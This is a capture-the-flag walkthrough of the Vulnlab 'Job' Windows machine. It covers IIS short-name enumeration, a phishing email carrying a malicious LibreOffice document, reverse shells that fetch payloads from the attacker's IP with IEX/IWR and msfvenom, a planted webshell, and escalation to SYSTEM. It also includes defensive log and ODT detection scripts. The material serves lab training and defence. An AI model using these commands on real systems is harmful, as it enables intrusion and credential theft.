VL-Job

Initial Enumeration

Initial port scan revealed several open ports:

PORT     STATE SERVICE       REASON          VERSION
25/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0

Vulnerability Discovery

Since the web server was IIS, I checked for the IIS short name (8.3) disclosure issue using the IIS Short Name Scanner:

java -jar iis_shortname_scanner.jar 2 20 http://10.10.94.31/

The scan revealed the server is vulnerable and identified some files:

Scanning...

Testing request method: "OPTIONS" with magic part: "/~1/.rem" ...
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,D,E,H,I,L,N,O,P,S,T,X
Early result: identified letters in extensions > A,H,M,P,S,T
File: HELLO~1.ASP
Dir: ASPNET~1
File: INDEX~1.HTM
[\] INDEX~1.HTT
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/04/02 17:40:37
Target: http://10.10.94.31/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
|_ Number of sent requests: 444
|_ Identified directories: 1
|_ ASPNET~1
|_ Identified files: 2
|_ HELLO~1.ASP
|_ Actual file name = HELLO
|_ INDEX~1.HTM
|_ Actual file name = INDEX
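From the defensive side, this kind of probing leaves a distinctive trace in the IIS W3C logs: a burst of requests from one client whose path pairs a wildcard with a ~<digit> 8.3 suffix (the scanner's "/~1/.rem" magic part above). The script below is an added example and not part of the original writeup; it parses a constructed log excerpt by its #Fields header and flags clients that send repeated probes (the probe shape and the column set are assumptions).

```python
import re
from collections import Counter

# Constructed IIS W3C log excerpt (not from the writeup); the #Fields header declares the columns.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2025-04-02 17:40:37 10.10.94.31 OPTIONS /*~1*/.rem - 80 10.8.5.195 404
2025-04-02 17:40:37 10.10.94.31 OPTIONS /a*~1*/.rem - 80 10.8.5.195 400
2025-04-02 17:40:38 10.10.94.31 OPTIONS /h*~1*/.rem - 80 10.8.5.195 404
2025-04-02 17:40:38 10.10.94.31 OPTIONS /he*~1*/.rem - 80 10.8.5.195 404
2025-04-02 17:40:39 10.10.94.31 GET /HELLO.ASPX - 80 10.8.5.195 200
2025-04-02 17:40:40 10.10.94.31 GET /index.htm - 80 192.0.2.7 200
"""

# Assumed probe shape: a wildcard directly beside a "~<digit>" short-name suffix.
PROBE = re.compile(r"\*~\d|~\d\*")

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def shortname_probes(text):
    """Count 8.3 probe requests per client IP."""
    hits = Counter()
    for rec in parse_w3c(text):
        if PROBE.search(rec.get("cs-uri-stem", "")):
            hits[rec["c-ip"]] += 1
    return hits

def flag_scanners(text, threshold=3):
    """Return clients whose probe count reaches the threshold, busiest first."""
    return [ip for ip, n in shortname_probes(text).most_common() if n >= threshold]

if __name__ == "__main__":
    for ip in flag_scanners(SAMPLE_LOG):
        print(f"possible IIS short-name enumeration from {ip}")
```

Turning off 8.3 name creation (fsutil 8dot3name) does not remove short names that already exist, so an existing web root still needs its names stripped or checked.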

Using the discovered information, I accessed the HELLO.ASPX file:

curl http://10.10.94.31/HELLO.ASPX

<html xmlns="www.w3.org/1999/xhtml">
<head><title>

</title></head>
<body>
<form method="post" action="./HELLO.ASPX" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NTYxMzIxNWRksO0e53iBgOk1F32mZVsjTztyPJmhrJc1OInj8vzB5Gk=" />

<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D4124C05" />
<div>

Hello World

</div>
</form>
</body>
</html>

I discovered a message on the website stating: “Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.”

Initial Access Strategy

This presented an opportunity for exploitation through malicious ODT files. I decided to use Metasploit’s ODT template:

use fileformat/odt_badodt

To capture hashes, I set up Responder:

sudo responder -I tun0 -dwv

I then sent the malicious ODT file by email:

sudo swaks --to career@job.local --from fake@example.com --server 10.10.94.31 --attach @/root/.msf4/local/bad.odt --header "Application" --body "Hello i am a softwere developer and I would like to apply for the job"

Screenshot: successfully obtained a user hash.
After capturing the hash, I attempted to crack it:

hashcat hash9099.txt /usr/share/wordlists/rockyou.txt

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JACK.BLACK::JOB:16c1cb50aabefdf2:b4ad21b5ac50c9dc89...000000
Time.Started.....: Wed Apr 2 18:41:19 2025 (7 secs)
Time.Estimated...: Wed Apr 2 18:41:26 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2066.3 kH/s (1.50ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Util: 69%

Unfortunately, the hash cracking attempt was unsuccessful.

Alternative Approach - Macro Exploitation

I decided to create a malicious LibreOffice macro:
Screenshots: macro creation, parts 1 to 5.
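Both the hash-capturing document built from the badodt template and the macro-bearing document above are things a mail gateway can triage before a recipient opens them. As an added example that is not part of the original writeup, the script below builds two constructed ODT-shaped archives in memory and inspects them for the two signals a defender would key on: Basic macro storage inside the zip, and xlink:href references to UNC, file:// or smb:// locations that would make the viewer reach out to another host on open (the exact markup the template emits is assumed, not taken from it).

```python
import io
import re
import zipfile

# Signals a gateway can key on: Basic macro storage inside the archive, and
# xlink:href targets that point off-host (UNC, file:// or smb://).
MACRO_PREFIXES = ("Basic/", "Scripts/")
EXTERNAL_HREF = re.compile(r'xlink:href="((?:\\\\|file://|smb://)[^"]*)"')

def build_odt(content_xml, with_macro=False):
    """Constructed, ODT-shaped zip built in memory as test input (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content_xml)
        if with_macro:  # where LibreOffice keeps Basic libraries inside an ODT
            z.writestr("Basic/script-lc.xml", "<library:libraries/>")
            z.writestr("Basic/Standard/Module1.xml", "<script:module>Sub Main\nEnd Sub</script:module>")
    return buf.getvalue()

def inspect_odt(data):
    """Return macro entries and external references found in one ODT byte string."""
    findings = {"macros": [], "external_refs": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith(MACRO_PREFIXES):
                findings["macros"].append(name)
            elif name.endswith(".xml"):  # content.xml, styles.xml, manifest, ...
                text = z.read(name).decode("utf-8", "replace")
                findings["external_refs"] += EXTERNAL_HREF.findall(text)
    return findings

def is_suspicious(data):
    """A CV should carry neither macros nor off-host references."""
    f = inspect_odt(data)
    return bool(f["macros"] or f["external_refs"])

# Constructed samples: a plain document and one carrying both signals (placeholder host).
BENIGN = build_odt("<office:document-content><text:p>Curriculum vitae</text:p></office:document-content>")
SUSPECT = build_odt(r'<office:document-content><draw:image xlink:href="\\EXAMPLE-HOST\share\x.jpg"/></office:document-content>', with_macro=True)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "suspicious" if is_suspicious(doc) else "clean", inspect_odt(doc))
```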

Getting a Shell

I set up a HoaxShell listener:

hoaxshell -s 10.8.5.195 --p 4444

Screenshot: HoaxShell listener ready.

Alternatively, we can create a DSVyper shell:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f raw -o shell.bin

Screenshot: DSVyper shell creation.
For the macro, we’d use:

powershell IEX(IWR http://10.8.5.195/shell.exe -UseBasicParsing);

I sent the email with the malicious ODT file:

swaks --to career@job.local --header "Application CV" --body "Hello, I'm a software developer and i am searching for a job, please review my application." --attach @hello.odt --server 10.10.94.31

Screenshot: successful shell callback.

Privilege Escalation

I attempted reconnaissance using PowerUp:

PS C:\Users\jack.black\Desktop > curl http://10.8.5.195/PowerUp.ps1 -o PowerUp.ps1
PS C:\Users\jack.black\Desktop > dir
Directory: C:\Users\jack.black\Desktop
PS C:\Users\jack.black\Desktop > Import-Module ./PowerUp.ps1
PS C:\Users\jack.black\Desktop > Invoke-AllChecks

Results showed:

HijackablePath : C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\jack.black\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'
-Command '...'

This approach didn't yield results.

I noticed that user jack.black is in the developers group, which meant we could modify the website's content. I placed a webshell in the wwwroot folder:
Screenshots: webshell creation; web shell in action.

I set up another HoaxShell listener:

hoaxshell -s 10.8.5.195 --port 4433

I pasted the HoaxShell command and got a new shell:
Screenshot: impersonating as the web service.

System Access

To obtain full system access, I generated a Meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

I uploaded the payload and set up a multi/handler:
Screenshot: Meterpreter multi/handler setup.
With the Meterpreter session established, I was able to escalate to SYSTEM:

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\system

C:\inetpub\wwwroot>

Conclusion

The Job machine was successfully compromised by exploiting:

  1. A vulnerability in how the server processes LibreOffice documents
  2. Web server write permissions available to the compromised user
  3. Service impersonation techniques for privilege escalation

https://api.vulnlab.com/api/v1/share?id=4fcb82b4-05e4-4b83-ac24-42fdc137a063